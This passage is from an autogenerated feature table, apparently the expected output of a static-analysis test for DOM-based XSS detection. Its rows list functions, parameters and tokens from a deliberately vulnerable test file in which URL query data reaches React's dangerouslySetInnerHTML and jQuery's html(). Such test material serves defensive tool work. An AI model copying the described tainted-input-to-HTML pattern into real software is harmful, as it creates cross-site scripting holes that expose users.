element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constructor | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constructor | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constructor | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constructor | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constructor | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of default constructor of class C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of default constructor of class C2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of default constructor of class C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of default constructor of class C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of default constructor of class C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of super(...args) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of super(...args) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of super(...args) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of super(...args) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | exceptional return of super(...args) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | return of default constructor of class C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | return of default constructor of class C2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | return of default constructor of class C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | return of default constructor of class C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | return of default constructor of class C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super | contextSurroundingFunctionParameters | ()\n(args) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super(...args) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super(...args) | contextSurroundingFunctionParameters | ()\n(args) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super(...args) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super(...args) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | super(...args) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:224:12 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:224:12 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:224:12 | test | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:224:12 | test | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:224:12 | test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:9:233:9 | test() ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:224:12 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:224:12 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:224:12 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:224:12 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:224:12 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | 'arguments' object of method test of class C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | 'arguments' object of method test of class C2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | 'arguments' object of method test of class C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | 'arguments' object of method test of class C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | 'arguments' object of method test of class C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | () {\\n ... } | assignedToPropName | test | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | () {\\n ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | () {\\n ... } | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | () {\\n ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | () {\\n ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | () {\\n ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | exceptional return of method test of class C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | exceptional return of method test of class C2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | exceptional return of method test of class C2 | enclosingFunctionBody | tainted document location search React createElement div 